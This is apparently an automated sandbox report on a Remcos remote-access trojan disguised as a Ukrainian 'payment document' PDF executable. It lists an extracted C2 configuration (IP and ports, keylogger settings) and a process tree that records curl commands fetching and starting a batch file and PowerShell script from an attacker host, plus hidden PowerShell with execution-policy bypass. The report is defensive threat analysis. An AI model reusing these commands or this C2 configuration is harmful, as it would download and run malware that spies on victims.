remcos | hxxps://www[.]4sync[.]com/web/directDownload/GLMgEB15/Qp7wijin[.]0a6e85fab81a6599f1cd05e88dd4aaea

Analysis

max time kernel
358s
max time network
359s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 23:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.4sync.com/web/directDownload/GLMgEB15/Qp7wijin.0a6e85fab81a6599f1cd05e88dd4aaea

Score

10^/10

remcos rmc_one discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

rmc_one

101.99.94.64:2404

101.99.94.64:80

101.99.94.64:8080

101.99.94.64:465

101.99.94.64:50000

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
rmc
mouse_option
false
mutex
HjoNmh22H-06BKOP
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
61	1848	powershell.exe
76	3248	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1848	powershell.exe
3248	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Електронний платіжний документ.pdf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Електронний платіжний документ.pdf.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	Електронний платіжний документ.pdf.exe

Executes dropped EXE 2 IoCs

pid	Process
3596	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe

Loads dropped DLL 6 IoCs

pid	Process
3596	Електронний платіжний документ.pdf.exe
3596	Електронний платіжний документ.pdf.exe
3596	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1848 set thread context of 916	1848	powershell.exe	132
PID 3248 set thread context of 4272	3248	powershell.exe	147

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Електронний платіжний документ.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Електронний платіжний документ.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3944	msedge.exe
3944	msedge.exe
4140	msedge.exe
4140	msedge.exe
5084	identity_helper.exe
5084	identity_helper.exe
3960	msedge.exe
3960	msedge.exe
1848	powershell.exe
1848	powershell.exe
1848	powershell.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
916	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	4316	7zG.exe
Token: 35	4316	7zG.exe
Token: SeSecurityPrivilege	4316	7zG.exe
Token: SeSecurityPrivilege	4316	7zG.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4316	7zG.exe
4316	7zG.exe
4316	7zG.exe
4140	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe
4140	msedge.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3596	Електронний платіжний документ.pdf.exe
3596	Електронний платіжний документ.pdf.exe
3596	Електронний платіжний документ.pdf.exe
916	RegAsm.exe
2632	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe
2632	Електронний платіжний документ.pdf.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4140 wrote to memory of 3128	4140	msedge.exe	82
PID 4140 wrote to memory of 3128	4140	msedge.exe	82
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 4160	4140	msedge.exe	83
PID 4140 wrote to memory of 3944	4140	msedge.exe	84
PID 4140 wrote to memory of 3944	4140	msedge.exe	84
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85
PID 4140 wrote to memory of 4260	4140	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.4sync.com/web/directDownload/GLMgEB15/Qp7wijin.0a6e85fab81a6599f1cd05e88dd4aaea
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff97a0846f8,0x7ff97a084708,0x7ff97a084718
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
  2⤵
  PID:4260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:1812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
  2⤵
  PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4220 /prefetch:8
  2⤵
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1944486098117038992,1539142258834786093,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3172 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1808

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4992

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\" -spe -an -ai#7zMap26033:246:7zEvent27083
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4316

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Код доступу 398558.txt
1⤵
PID:3804

C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe
"C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3596
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nngvsnkb\nngvsnkb.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB36D.tmp" "c:\Users\Admin\AppData\Local\Temp\nngvsnkb\CSCA1BF3489E8FA421E9489908EDA83DBD8.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" & start DeleteApp.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:224
- - C:\Windows\SysWOW64\curl.exe
    curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K DeleteApp.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2468
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
      4⤵
      System Location Discovery: System Language Discovery
      PID:2284
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
        5⤵
        
        PID:2092
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1848
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awczjdrf\awczjdrf.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3284
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp" "c:\Users\Admin\AppData\Local\Temp\awczjdrf\CSC20EA8BB719104AC39716A89AF81334B2.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3412
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:916

C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe
"C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2632
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pvsf1haa\pvsf1haa.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF112.tmp" "c:\Users\Admin\AppData\Local\Temp\pvsf1haa\CSC7401F15A26074EE9B96DBA229D79A5C3.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" & start DeleteApp.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1920
- - C:\Windows\SysWOW64\curl.exe
    curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq"
    3⤵
    PID:3412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K DeleteApp.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3284
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3876
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
        5⤵
        
        PID:5080
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3248
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
